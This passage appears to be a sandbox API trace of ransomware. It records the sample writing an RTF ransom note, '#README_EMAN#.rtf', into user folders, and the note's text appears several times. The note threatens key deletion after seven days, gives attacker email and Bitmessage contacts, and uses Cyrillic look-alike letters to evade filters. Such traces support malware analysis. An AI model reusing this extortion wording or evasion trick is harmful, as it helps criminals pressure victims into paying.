TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.362] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.363] CloseHandle (hObject=0x294) returned 1 [0272.363] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0272.363] GetLastError () returned 0x2 [0272.363] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic 